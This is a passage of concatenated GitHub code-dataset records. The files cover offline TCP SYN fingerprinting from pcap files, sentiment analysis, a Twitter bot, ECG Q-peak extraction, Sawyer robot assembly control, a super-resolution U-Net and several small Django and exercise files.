rules.\n\n NEW SIGNATURES: Use '*' for any commodity OSes where MSS is\n around 1300 - 1500, unless you know for sure that it's fixed.\n If the value is outside that range, you can probably copy it\n literally.\n '''\n mss = dict(self.p['TCP'].options)\n try:\n return str(mss['MSS'])\n except:\n return '*'\n\n @property\n def window_size(self):\n '''\n Window size. Can be expressed as a fixed value, but many\n operating systems set it to a multiple of MSS or MTU, or a\n multiple of some random integer. P0f automatically detects these\n cases, and allows notation such as 'mss*4', 'mtu*4', or '%8192'\n to be used. Wilcard ('*') is possible too.\n '''\n window_size = self.p['TCP'].window\n if self.mss != '*':\n if (self.p['TCP'].window / int(self.mss)).is_integer():\n window_size = \"mss*\" + str(int(self.p['TCP'].window / int(self.mss)))\n return str(window_size)\n\n @property\n def scale(self):\n '''\n Window scaling factor, if specified in TCP options. Fixed value\n or '*'.\n NEW SIGNATURES: Copy literally, unless the value varies randomly.\n Many systems alter between 2 or 3 scaling factors, in which case,\n it's better to have several 'sig' lines, rather than a wildcard.\n '''\n options = dict(self.p['TCP'].options)\n try:\n return options['WScale']\n except:\n return '*'\n\n @property\n def olayout(self):\n '''\n comma-delimited layout and ordering of TCP options, if any. This\n is one of the most valuable TCP fingerprinting signals. Supported\n values.\n '''\n if len(self.p['TCP'].options) == 0:\n return '*'\n else:\n loo = []\n for i in self.p['TCP'].options:\n loo.append(signature.process_options(i))\n return ','.join(map(str, loo))\n\n @property\n def quirk(self):\n '''\n Comma-delimited properties and quirks observed in IP or TCP\n headers.\n '''\n q = quirk(self.p)\n return str(q)\n\n @property\n def pclass(self):\n '''\n Payload size classification: '0' for zero, '+' for non-zero,\n '*' for any. The packets we fingerprint right now normally have\n no payloads, but some corner cases exist.\n '''\n pclass = len(self.p['TCP'].payload)\n if pclass != 0:\n pclass = '+'\n return str(pclass)\n\n @property\n def qstring(self):\n qstring = \"{ver}:{ittl}:{olen}:{mss}:{wsize}:{scale}:{olayout}:{quirk}:{pclass}\".format(ver=self.version, ittl=self.ittl, olen=self.olen, mss=self.mss, wsize=self.window_size, scale=self.scale, olayout=self.olayout, quirk=self.quirk, pclass=self.pclass)\n return qstring\n\n def __str__(self):\n return self.qstring\n\n\n\n# SNIFFFFFFFFING\n############################################\n# Takes the packet and onLY LOOKS AT sYNs\npcap = sys.argv[1:].pop()\npackets = sniff(offline=pcap, filter=\"tcp[tcpflags] & tcp-syn != 0\")\n\n# Extracts the signature\nfor i in packets:\n packet_signature = signature(i)\n print(\"\\n\\nSignature Identified for: {IP} --> {signature}\".format(IP=i['IP'].src, signature=str(packet_signature)))","repo_name":"but-i-am-dominator/fingerprint_pull","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22536850471","text":"from __future__ import print_function\n\nimport argparse\nimport json\nimport os\nimport tempfile\nimport csv\n\nfrom rosette.api import API, DocumentParameters, RosetteException\nurlPrefix = 'https://www.reuters.com'\n\n\ndef run(key, url, alt_url='https://api.rosette.com/rest/v1/'):\n \"\"\" Run the example \"\"\"\n # Create default file to read from\n \n\n # Create an API instance\n api = API(user_key=key, service_url=alt_url)\n\n params = DocumentParameters()\n params[\"language\"] = \"eng\"\n params[\"contentUri\"] = url\n\n # Use an HTML file to load data instead of a string\n #params.load_document_file(temp_file.name)\n try:\n result = api.sentiment(params)\n\n except RosetteException as exception:\n print(exception)\n finally:\n # Clean up the file\n #temp_file.close()\n \n return result\n\n\nPARSER = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Calls the ' +\n os.path.splitext(os.path.basename(__file__))[0] + ' endpoint')\nPARSER.add_argument('-k', '--key', help='Rosette API Key', required=True)\nPARSER.add_argument('-u', '--url', help=\"Alternative API URL\",\n default='https://api.rosette.com/rest/v1/')\n\ndef extractUrl(ARGS):\n newlist = []\n filename = 'test.csv'\n with open(filename, 'rU') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n date = str(row['date'])\n url = urlPrefix + str(row['url'])\n print(url)\n RESULT = run(ARGS.key, url, ARGS.url)\n data = json.loads(json.dumps(RESULT, indent=2, ensure_ascii=False,\n sort_keys=True).encode(\"utf8\"))\n\n entityLabel = ''\n conf = ''\n for entity in data['entities']:\n if entity['mention'] == 'Apple' :\n entityLabel = entity['sentiment']['label']\n conf = entity['sentiment']['confidence']\n\n newlist.append({\n 'date' : date,\n 'label' : data['document']['label'],\n 'confidence' : data['document']['confidence'],\n 'entity-label' : entityLabel,\n 'entity-confidence' : conf\n #'entityLabel' : data['entity']\n })\n return newlist\n\n\nif __name__ == '__main__':\n out = 'result4001-end.csv'\n ARGS = PARSER.parse_args()\n #url = 'https://www.reuters.com/article/petriepartners-rothschild/rothschild-petrie-partners-form-energy-restructuring-partnership-idUSL1N13I1HA20151123'\n #extractUrl()\n \n finalResult = extractUrl(ARGS)\n \n #we only care about confidence and label here\n with open(out, \"wb\") as csvfile:\n fieldnames = ('date', 'label', 'confidence', 'entity-label', 'entity-confidence')\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n \n for row in finalResult: \n writer.writerow(row)","repo_name":"runzhoucao/Columbia-COMS4995-StockPrediction","sub_path":"SentimentAnalysis/getSentimentScore.py","file_name":"getSentimentScore.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28720251191","text":"\n# Return true if the given non-negative number is a multiple of 3 or 5, but not both.\n\n\n# old35(3) → true\n# old35(10) → true\n# old35(15) → false\n\ndef old35(n):\n\n\tif n%5==0 and n%3==0:\n\t\treturn False\n\n\n\telif n%5==0 or n%3==0:\n\t\treturn True\n\nprint(old35(3))\nprint(old35(10))\nprint(old35(15))\n","repo_name":"aamiriqbal071/CodingBat","sub_path":"Logic-1/old35.py","file_name":"old35.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37253184114","text":"import os.path\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\nSCOPES = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/spreadsheets']\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nSERVICE_ACCOUNT_FILE = os.path.join(BASE_DIR, 'credentials.json')\n\n# Установите путь к вашему файлу JSON с учетными данными\ncredentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# Авторизуйтесь и откройте т��блицу\nservice = build('sheets', 'v4', credentials=credentials)\n\n# Укажите ID таблицы\nspreadsheet_id = '1cXcNL1WD8HWM_Q64881-1GHyvPb3KLbJzacGgLDMR18'\n\n# Установите диапазон ячеек, где находятся вопросы и ответы\nrange_name = 'вопросы хищники!A3:C'\n\n\n# Функция для получения вопросов и ответов из таблицы\ndef get_questions():\n result = service.spreadsheets().values().get(spreadsheetId=spreadsheet_id, range=range_name).execute()\n values = result.get('values', [])\n return values\n","repo_name":"Alex85p/MoscowZooTGBot","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34184819472","text":"import tweepy\nfrom decouple import config\n\nimport json\nfrom datetime import datetime\nfrom time import sleep\n\n#today's date\ntoday_date = datetime.now().date()\n\n#open data\nf= open(f'api/data/{today_date}-nfts-daily.json') #* path \n\n#twitter credentials\nAPI_KEY = config('TWITTER_API_KEY')\nAPI_KEY_SECRET = config('API_KEY_SECRET')\nACCESS_TOKEN = config('ACCESS_TOKEN')\nACCESS_TOKEN_SECRET = config('ACCESS_TOKEN_SECRET')\n\n\n\nauth = tweepy.OAuthHandler(API_KEY, API_KEY_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\ntry:\n api.verify_credentials()\n print(\"Authentication Successful\")\nexcept:\n print(\"Authentication Error\")\n\n\ndef tweet_data():\n data = json.load(f)\n n = len(data)\n print(n)\n while n >= 0:\n n-=1\n try:\n for each in [data[n]]:\n tweet=f'''{each['nft_name']} sold for {each['price']} {each['date']} \\nLink: {each['nft_url']}'''\n #print(tweet)\n sleep(1)\n api.update_status(tweet)\n except tweepy.TweepyException as e:\n print(e)\n sleep(2)\n\nif __name__ == '__main__':\n tweet_data()","repo_name":"vantage-ola/dailyNFTs-Bot","sub_path":"tweet/send_data.py","file_name":"send_data.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40018184005","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import interpolate\nx = np.asarray([0, 11, 25, 39, 53, 63])\ny = x**2\np = np.arange(4)\np_avg = np.sum(p)\np_6 = np.insert(p,[0,4],p_avg)\n\n\nf = interpolate.interp1d(x, p_6)\n\nxnew = np.arange(0, 64, 1)\nynew = f(xnew) # use interpolation function returned by `interp1d`\nplt.plot(x, y, 'o', xnew, ynew, '-')\nplt.show()\n","repo_name":"lsy105/symbol_detection","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18668361478","text":"from django.urls import path\n\nfrom ordersapp.views import OrderListView, OrderCreateView, OrderUpdateView, OrderDelete, order_forming_complete, \\\n OrderDetail, get_product_price\n\napp_name = 'ordersapp'\n\nurlpatterns = [\n path('', OrderListView.as_view(), name='order_list'),\n path('create/', OrderCreateView.as_view(), name='order_create'),\n path('edit//', OrderUpdateView.as_view(), name='order_update'),\n path('delete//', OrderDelete.as_view(), name='order_delete'),\n path('complete//', order_forming_complete, name='order_forming_complete'),\n path('detail//', OrderDetail.as_view(), name='order_detail'),\n path('product//price/', get_product_price, name='get_product_price')\n\n]\n","repo_name":"Kllraz/geekshop","sub_path":"ordersapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30183648845","text":"def add_function(numbers: list):\n sums = 0\n for i in numbers:\n sums += i\n return sums\n\n\ndef multiply_function(numbers: list):\n multiply = 1\n for total in numbers:\n multiply *= total\n return multiply\n\n\ndef largest_function(numbers: list):\n largest = 0\n for number in numbers:\n if number > largest:\n largest = number\n return largest\n\n\ndef smallest_function(numbers: list):\n smallest = numbers[0]\n for number in numbers:\n if number < smallest:\n smallest = number\n return smallest\n\n\ndef no_duplicate(numbers):\n unique_value = []\n for number in numbers:\n if number not in unique_value:\n unique_value.append(number)\n return unique_value\n\n\ndef triple_element(numbers):\n tripled_value = []\n for number in numbers:\n tripled_value.append(number ** 3)\n return tripled_value\n","repo_name":"Favourmbata/python-project","sub_path":"tests/list_exercise.py","file_name":"list_exercise.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25308895413","text":"import warnings\n\nimport neurokit2 as nk\nimport numpy as np\nimport pandas as pd\nfrom tpcp import make_action_safe\n\nfrom empkins_micro.feature_extraction.pep.algorithms.base_extraction import BaseExtraction\n\n\nclass QPeakExtraction_NeurokitDwt(BaseExtraction):\n \"\"\"algorithm to extract Q-wave peaks (= R-wave onset) from ECG signal using neurokit ecg_delineate function with\n discrete wavelet method\"\"\"\n\n @make_action_safe\n def extract(self, signal_clean: pd.Series, heartbeats: pd.DataFrame, sampling_rate_hz: int):\n \"\"\"function which extracts Q-wave peaks from given ECG cleaned signal\n\n Args:\n signal_clean:\n cleaned ECG signal\n heartbeats:\n pd.DataFrame containing one row per segmented heartbeat, each row contains start, end, and R-peak\n location (in samples from beginning of signal) of that heartbeat, index functions as id of heartbeat\n sampling_rate_hz:\n sampling rate of ECG signal in hz\n\n Returns:\n saves resulting Q-peak locations (samples) in points_ attribute of super class (in the row of the heartbeat\n to which the respective Q-peak corresponds), index is heartbeat id,\n NaN when no Q-peak could be detected in that heartbeat\n \"\"\"\n\n # result df\n q_peaks = pd.DataFrame(index=heartbeats.index, columns=[\"q_peak\"])\n\n # used subsequently to store ids of heartbeats for which no AO or IVC could be detected\n heartbeats_no_q = []\n heartbeats_q_after_r = []\n\n # some neurokit functions (for example ecg_delineate()) don't work with r-peaks input as Series, so list instead\n r_peaks = list(heartbeats[\"r_peak_sample\"])\n\n _, waves = nk.ecg_delineate(signal_clean, rpeaks=r_peaks, sampling_rate=sampling_rate_hz, method=\"dwt\",\n show=False, show_type=\"peaks\") # show can also be set to False\n\n extracted_q_peaks = waves[\"ECG_Q_Peaks\"]\n\n # find heartbeat to which Q-peak belongs and save Q-peak position in corresponding row\n for idx, q in enumerate(extracted_q_peaks):\n\n # for some heartbeats, no Q can be detected, will be NaN in resulting df\n if np.isnan(q):\n heartbeats_no_q.append(idx)\n else:\n heartbeat_idx = heartbeats.loc[(heartbeats[\"start_sample\"] < q) & (q < heartbeats[\"end_sample\"])].index[0]\n\n # Q occurs after R, which is not valid\n if heartbeats[\"r_peak_sample\"].loc[heartbeat_idx].item() < q:\n heartbeats_q_after_r.append(heartbeat_idx)\n q_peaks.at[heartbeat_idx, \"q_peak\"] = np.NaN\n\n # valid Q-peak found\n else:\n q_peaks.at[heartbeat_idx, \"q_peak\"] = q\n\n # inform user about missing Q-values\n if q_peaks.isna().sum()[0] > 0:\n nan_rows = q_peaks[q_peaks[\"q_peak\"].isna()]\n nan_rows.drop(index=heartbeats_q_after_r, inplace=True)\n nan_rows.drop(index=heartbeats_no_q, inplace=True)\n warnings.warn(f\"No Q-peak detected in {q_peaks.isna().sum()[0]} heartbeats (for heartbeats \"\n f\"{heartbeats_no_q} the neurokit algorithm was not able to detect a Q-peak; for heartbeats \"\n f\"{heartbeats_q_after_r} the detected Q is invalid because it occurs after R; for \"\n f\"{nan_rows.index.values} apparently none of the found Q-peaks were within these heartbeats)\")\n\n self.points_ = q_peaks\n return self\n","repo_name":"empkins/empkins-micro","sub_path":"empkins_micro/feature_extraction/pep/algorithms/ecg/extraction_q_peak_neurokit_dwt.py","file_name":"extraction_q_peak_neurokit_dwt.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13074049109","text":"# coding=utf-8\n\nimport rospy\nimport math\n\nimport moveit_commander\nimport moveit_msgs.msg\n\nfrom math import pi\nfrom scipy.spatial.transform import Rotation as R\nfrom moveit_commander.conversions import pose_to_list\n\nimport intera_interface\nimport intera_external_devices\nfrom intera_interface import CHECK_VERSION\n\nimport numpy as np\nimport geometry_msgs.msg\nfrom geometry_msgs.msg import (\n PoseStamped,\n Pose,\n Point,\n Quaternion,\n)\nfrom std_msgs.msg import Header\nfrom sensor_msgs.msg import JointState\nfrom voice.msg import VoiceMsg\n\nfrom intera_core_msgs.srv import (\n SolvePositionIK,\n SolvePositionIKRequest,\n)\n\n\ndef all_close(goal, actual, tolerance):\n if type(goal) is list:\n for index in range(len(goal)):\n if abs(actual[index] - goal[index]) > tolerance:\n return False\n\n elif type(goal) is geometry_msgs.msg.PoseStamped:\n return all_close(goal.pose, actual.pose, tolerance)\n\n elif type(goal) is geometry_msgs.msg.Pose:\n return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)\n\n return True\n\n\n\n\n\nclass MoveGroupPythonIntefaceTutorial(object):\n \"\"\"MoveGroupPythonIntefaceTutorial\"\"\"\n\n def __init__(self):\n super(MoveGroupPythonIntefaceTutorial, self).__init__()\n joint_state_topic = ['joint_states:=/robot/joint_states']\n moveit_commander.roscpp_initialize(joint_state_topic)\n\n robot = moveit_commander.RobotCommander()\n scene = moveit_commander.PlanningSceneInterface()\n\n group_name = \"right_arm\"\n move_group = moveit_commander.MoveGroupCommander(group_name)\n\n display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',\n moveit_msgs.msg.DisplayTrajectory,\n queue_size=20)\n\n # We can get the name of the reference frame for this robot:\n planning_frame = move_group.get_planning_frame()\n print(\"============ Planning frame: %s\" % planning_frame)\n\n # We can also print the name of the end-effector link for this group:\n eef_link = move_group.get_end_effector_link()\n print(\"============ End effector link: %s\" % eef_link)\n\n # We can get a list of all the groups in the robot:\n group_names = robot.get_group_names()\n # print(\"============ Available Planning Groups:\", robot.get_group_names())\n\n # Sometimes for debugging it is useful to print the entire state of the\n # robot:\n # print(\"============ Printing robot state\")\n # print(robot.get_current_state())\n\n self.box_name = ''\n self.robot = robot\n self.scene = scene\n self.move_group = move_group\n self.display_trajectory_publisher = display_trajectory_publisher\n self.planning_frame = planning_frame\n self.eef_link = eef_link\n self.group_names = group_names\n\n\nclass RobotInit(MoveGroupPythonIntefaceTutorial):\n def __init__(self, speed=0.3):\n super(RobotInit, self).__init__()\n self.rs = intera_interface.RobotEnable(CHECK_VERSION)\n init_state = self.rs.state().enabled\n self.rp = intera_interface.RobotParams()\n self.valid_limbs = self.rp.get_limb_names()\n self.limb = intera_interface.Limb(self.valid_limbs[0])\n self.joint_names = self.limb.joint_names()\n self.limb.set_joint_position_speed(speed)\n self.gripper = None\n self.original_deadzone = None\n self._rate = 500.0\n self.rate = rospy.Rate(self._rate)\n self.move_group.set_max_acceleration_scaling_factor(speed)\n self.move_group.set_max_velocity_scaling_factor(speed)\n self.cameras = intera_interface.Cameras()\n self.right_camera_name = \"right_hand_camera\"\n sub = rospy.Subscriber(\"voice\", VoiceMsg, self.voice_callback, queue_size=1, buff_size=1, tcp_nodelay=True)\n\n self.response = None\n self.trans_matrix = None\n\n try:\n self.gripper = intera_interface.Gripper(self.valid_limbs[0] + '_gripper')\n except (ValueError, OSError) as e:\n rospy.logerr(\"Could not detect an electric gripper attached to the robot.\")\n self.clean_shutdown()\n\n def set_detect_result(self, response):\n self.response = response\n\n def set_transmatrix(self, transmatrix):\n self.trans_matrix = transmatrix\n\n def change_speed(self, speed): # 改变关节的速度(0-1)\n self.limb.set_joint_position_speed(speed)\n\n def clean_shutdown(self): # 设置夹爪的死区\n if self.gripper and self.original_deadzone:\n self.gripper.set_dead_zone(self.original_deadzone)\n print(\"Exiting example.\")\n\n def set_camera_gain(self, gain_value, camera_name=\"right_hand_camera\"): # 头部相机为 head_camera\n cameras = self.cameras\n if cameras.set_gain(camera_name, gain_value):\n rospy.loginfo(\"Gain set to: {0}\".format(cameras.get_gain(camera_name)))\n\n # 控制相机的曝光\n def set_camera_exposure(self, exposure_value, camera_name=\"right_hand_camera\"): # 头部相机为 head_camera\n cameras = self.cameras\n if cameras.set_exposure(camera_name, exposure_value):\n rospy.loginfo(\"Exposure set to: {0}\".format(cameras.get_exposure(camera_name)))\n\n def go_to_camera_position(self):\n joints_command = {'right_j0': -2.3301435546875, 'right_j1': -3.047884765625, 'right_j2': 1.4562392578125,\n 'right_j3': -1.4219619140625, 'right_j4': 1.7223046875, 'right_j5': 0.00515625,\n 'right_j6': 3.3662646484375}\n\n self.limb.move_to_joint_positions(joints_command)\n\n def control_gripper(self, cmd_pos, dead_zone=0.): # 0~100 close~open\n self.gripper.set_dead_zone(dead_zone)\n # cmd_pos = max(min(self.gripper.get_position() + offset_pos, self.gripper.MAX_POSITION),\n # self.gripper.MIN_POSITION)\n cmd_pos /= 2000.\n self.gripper.set_position(cmd_pos)\n\n def get_gripper_position(self):\n return self.gripper.get_position()\n\n def get_gripper_force(self):\n return self.gripper.get_force()\n\n def get_gripper_object_weight(self): # right_hand:position, orientation\n return self.gripper.get_object_weight()\n\n def voice_callback(self, msg):\n \"\"\"\n rect round hex rect-b round-b hex-b\n cl 0 1 2 3 4 5\n v-order 2 3 4\n @param msg:\n @return:\n \"\"\"\n print('receive command is: {}.'.format(msg.order))\n\n if msg.order == 2:\n self.assembly_proc(0)\n elif msg.order == 3:\n self.assembly_proc(1)\n elif msg.order == 4:\n self.assembly_proc(2)\n\n def moveit_move(self, position, orientation=None):\n move_group = self.move_group\n pose_goal = geometry_msgs.msg.Pose()\n if orientation is not None:\n pose_goal.orientation.x = orientation[0]\n pose_goal.orientation.y = orientation[1]\n pose_goal.orientation.z = orientation[2]\n pose_goal.orientation.w = orientation[3]\n else:\n pose_goal.orientation.x = 0.707\n pose_goal.orientation.y = -0.707\n pose_goal.orientation.z = 0.0\n pose_goal.orientation.w = 0.0\n\n pose_goal.position.x = position[0]\n pose_goal.position.y = position[1]\n pose_goal.position.z = position[2]\n\n move_group.set_pose_target(pose_goal)\n plan = move_group.go(wait=True)\n move_group.stop()\n move_group.clear_pose_targets()\n current_pose = self.move_group.get_current_pose().pose\n return all_close(pose_goal, current_pose, 0.01)\n\n def sawyer_ik_move(self, position, orientation=None):\n ns = \"ExternalTools/\" + self.valid_limbs[0] + \"/PositionKinematicsNode/IKService\"\n iksvc = rospy.ServiceProxy(ns, SolvePositionIK)\n ikreq = SolvePositionIKRequest()\n hdr = Header(stamp=rospy.Time.now(), frame_id='base')\n\n if orientation == None:\n orientation_ = Quaternion(x=0.707, y=-0.707, z=0.0, w=0.0, )\n else:\n orientation_ = Quaternion(x=orientation[0], y=orientation[1], z=orientation[2], w=orientation[3], )\n\n poses = {'right': PoseStamped(header=hdr,\n pose=Pose(position=Point(\n x=position[0], y=position[1], z=position[2], ),\n orientation=orientation_,\n ), ), }\n ikreq.pose_stamp.append(poses[self.valid_limbs[0]])\n # Request inverse kinematics from base to \"right_hand\" link\n ikreq.tip_names.append('right_hand')\n\n try:\n rospy.wait_for_service(ns, 5.0)\n resp = iksvc(ikreq)\n except (rospy.ServiceException, rospy.ROSException) as e:\n rospy.logerr(\"Service call failed: %s\" % (e,))\n return False\n\n if resp.result_type[0] > 0:\n seed_str = {\n ikreq.SEED_USER: 'User Provided Seed',\n ikreq.SEED_CURRENT: 'Current Joint Angles',\n ikreq.SEED_NS_MAP: 'Nullspace Setpoints',\n }.get(resp.result_type[0], 'None')\n rospy.loginfo(\"SUCCESS - Valid Joint Solution Found from Seed Type: %s\" %\n (seed_str,))\n # Format solution into Limb API-compatible dictionary\n limb_joints = dict(list(zip(resp.joints[0].name, resp.joints[0].position)))\n\n rospy.loginfo(\"\\nIK Joint Solution:\\n%s\", limb_joints)\n rospy.loginfo(\"------------------\")\n # rospy.loginfo(\"Response Message:\\n%s\", resp)\n self.limb.move_to_joint_positions(limb_joints)\n else:\n rospy.logerr(\"INVALID POSE - No Valid Joint Solution Found.\")\n rospy.logerr(\"Result Error %d\", resp.result_type[0])\n return False\n\n def get_cur_pos(self):\n return intera_interface.Limb(self.valid_limbs[0]).endpoint_pose()\n\n def adjust_det_pose(self, detect_position, bias):\n detect_position[0] += bias[0]\n detect_position[1] += bias[1]\n detect_position[2] += bias[2]\n\n return detect_position\n\n def assembly_proc(self, cl):\n if self.response is None or self.trans_matrix is None:\n print('detect result is not prepared')\n return\n\n detect_orientation = [0.0, 1.0, 0.0, 0.0]\n response = self.response\n\n workpiece_position = self.trans_matrix.dot([response[cl].pos_x, response[cl].pos_y, response[cl].pos_z, 1])\n print('workpiece: ', cl, response[cl].pos_x, response[cl].pos_y, response[cl].pos_z, response[cl].cl)\n print(workpiece_position)\n\n detect_position = np.array([workpiece_position[0], workpiece_position[1], workpiece_position[2]])\n detect_position = self.adjust_det_pose(detect_position, [-0.008, 0.015, 0.0])\n self.moveit_move(detect_position, detect_orientation)\n\n detect_position = self.adjust_det_pose(detect_position, [0., 0., -0.07])\n self.moveit_move(detect_position, detect_orientation)\n self.control_gripper(0)\n\n # detect_position = base_position\n detect_position = self.adjust_det_pose(detect_position, [0., 0., 0.40])\n self.moveit_move(detect_position, detect_orientation)\n print(\"*** grasp workpiece {} is finished\".format(cl))\n\n base_cl = cl + 3\n\n position = self.trans_matrix.dot([response[base_cl].pos_x, response[base_cl].pos_y, response[base_cl].pos_z, 1])\n base_detect_position = np.array([position[0], position[1], position[2]])\n\n if base_cl == 3:\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.008, 0.01, 0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.change_speed(0.02)\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.002, 0.005, -0.015])\n self.moveit_move(base_detect_position, detect_orientation)\n\n elif base_cl == 4:\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.008, 0.01, 0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.change_speed(0.02)\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.0015, 0.002, -0.015])\n self.moveit_move(base_detect_position, detect_orientation)\n\n elif base_cl == 5:\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.008, 0.01, 0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.change_speed(0.02)\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.002, 0.002, -0.015])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.control_gripper(100)\n print(\"*** put in base {} is finished\".format(base_cl))\n self.change_speed(0.3)\n self.moveit_move(np.array([0.251, -0.154, 0.599]), detect_orientation)\n\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"control_node\", anonymous=True)\n","repo_name":"sixgods66/work_on_sawyer","sub_path":"scripts/robot_utils.py","file_name":"robot_utils.py","file_ext":"py","file_size_in_byte":13797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2626005879","text":"import numpy as np\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras.layers import *\nfrom keras.models import Model\nfrom layers.pixel_shuffle import PixelShuffle\n\n\ndef BilinearUpSampling2D(stride, **kwargs):\n def layer(x):\n input_shape = K.int_shape(x)\n output_shape = (stride[0] * input_shape[1], stride[1] * input_shape[2])\n return tf.image.resize_bilinear(x, output_shape, align_corners=True)\n return Lambda(layer, **kwargs)\n\n\ndef conv_block(x, filters=64, batch_norm=False):\n x = Conv2D(64, (3, 3), padding='same')(x)\n if batch_norm:\n x = BatchNormalization()(x)\n x = ReLU()(x)\n return x\n\n\ndef up_block(x, y, filters=64, batch_norm=False):\n x = BilinearUpSampling2D((2, 2))(x)\n x = Conv2D(512, (3, 3), padding='same')(x)\n if batch_norm:\n x = BatchNormalization()(x)\n x = ReLU()(x)\n x = Concatenate()([x, y])\n x = Conv2D(512, (3, 3), padding='same')(x)\n x = ReLU()(x)\n x = Conv2D(512, (3, 3), padding='same')(x)\n if batch_norm:\n x = BatchNormalization()(x)\n x = ReLU()(x)\n return x\n\n\ndef create_model(input_shape=(64, 64, 3), scale_factor=3):\n '''\n U-Net based architecture with skip connections and bilinear interpolation upsampling.\n PixelShuffle is added as a final upsampling layer to enlarge to SR.\n '''\n\n img_input = Input(shape=input_shape)\n\n # Encoder\n enc1 = conv_block(img_input, 64)\n enc1 = conv_block(enc1, 64)\n down = MaxPooling2D()(enc1)\n\n enc2 = conv_block(down, 128)\n enc2 = conv_block(enc2, 128)\n down = MaxPooling2D()(enc2)\n\n enc3 = conv_block(down, 256)\n enc3 = conv_block(enc3, 256)\n down = MaxPooling2D()(enc3)\n\n enc4 = conv_block(down, 512)\n enc4 = conv_block(enc4, 512)\n down = MaxPooling2D()(enc4)\n\n enc5 = conv_block(down, 1024)\n enc5 = conv_block(enc5, 1024)\n\n # Center\n cent = Conv2D(256, (1, 1))(enc5)\n cent = ReLU()(cent)\n\n # Decoder\n dec = up_block(cent, enc4, 512)\n dec = up_block(dec, enc3, 256)\n dec = up_block(dec, enc2, 128)\n dec = up_block(dec, enc1, 64)\n\n dec = Conv2D(3 * (scale_factor ** 2), (3, 3), padding='same')(dec)\n dec = PixelShuffle(r=scale_factor)(dec)\n dec = Activation('sigmoid')(dec)\n\n return Model(img_input, dec)\n","repo_name":"tomasmikeska/superresolution","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18854517480","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='WorkImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', models.FileField(upload_to=b'work/images/')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('text', models.TextField(max_length=2000)),\n ('client', models.CharField(max_length=200)),\n ('role', models.CharField(max_length=500)),\n ('included', models.CharField(max_length=500)),\n ('url', models.CharField(max_length=300)),\n ('thumbnail', models.FileField(upload_to=b'work/thumbnails/')),\n ('pub_date', models.DateTimeField(auto_now_add=True)),\n ('image', models.ManyToManyField(to='works.WorkImage')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('pub_date', 